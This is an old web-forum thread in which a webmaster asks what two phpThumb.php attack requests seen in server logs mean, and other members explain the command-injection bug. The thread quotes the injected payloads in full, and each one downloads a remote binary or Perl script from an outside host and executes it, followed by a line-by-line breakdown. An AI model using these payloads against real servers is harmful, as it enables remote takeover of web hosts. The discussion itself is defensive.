1. Home
  2. Forums Index
  3. Server Side / PHP Server Side Scripting 3:14 am Apr 28, 2026

Forum Moderators: coopster

Message Too Old, No Replies

translation?

         

lucy24

10:48 pm on Dec 27, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Can someone who speaks php translate these two queries? Both came attached to requests for (nonexistent) phpThumb.php files. This was a robot wearing street clothes, and it was blocked at the door, so no point to posting in User Agent ID; I'm just curious.

src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; &phpThumbDebug=9

src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f; &phpThumbDebug=9

Any inherent meaning, or is it the php equivalent of rattling the doorknob to see if it might be unlocked? The IP address in the second version belongs to ThePlanet-- in a range that I blocked ages ago for reasons unknown. I wasn't foolhardy enough to investigate the .co.uk link.

penders

12:31 pm on Dec 28, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



...rattling the doorknob to see if it might be unlocked?


It certainly looks that way.

I've not used phpThumb.php myself but I would guess that it allows certain parameters to be passed in via the URL - perhaps when unsecured it allows more? It hit the news a while back when a big security hole was found [secunia.com]. Popular with Wordpress users.

src = file.jpg
fltr[] = blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f;
phpThumbDebug = 9


If in phpThumbDebug mode 9 (?!) it was allowed to execute this shell script (or any script) on the server then I see potential for disaster. (I think this particular script would try to download a remote perl script and run it on your server!?)

lostdreamer

3:23 pm on Jan 3, 2012 (gmt 0)

10+ Year Member



Indeed, There is a bug in phpThumb() function that allows for arbitrary code execution.

What it tries to do:
1)
ls -l /tmp; Show detailed view of files in /tmp
wget -O /tmp/barbut6 bingoooo.co.uk/barbut6; Download file barbut6 from bingoooo.co.uk
chmod 0755 /tmp/barbut6; allow barbut6 to be executed
/tmp/barbut6; Run barbut6
ps -aux;Show all running programs

2)
ls -l /tmp; Show detailed view of files in /tmp
wget -O /tmp/f 67.19.79.203/f; Download file "f" from the IP
killall -9 perl; Kill running program PERL
perl /tmp/f; Run the "f" script with Perl


If you don't have phpThumb.php then you have nothing to worry about.
 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

  1. Home
  2. Forums Index
  3. Server Side / PHP Server Side Scripting 3:14 am Apr 28, 2026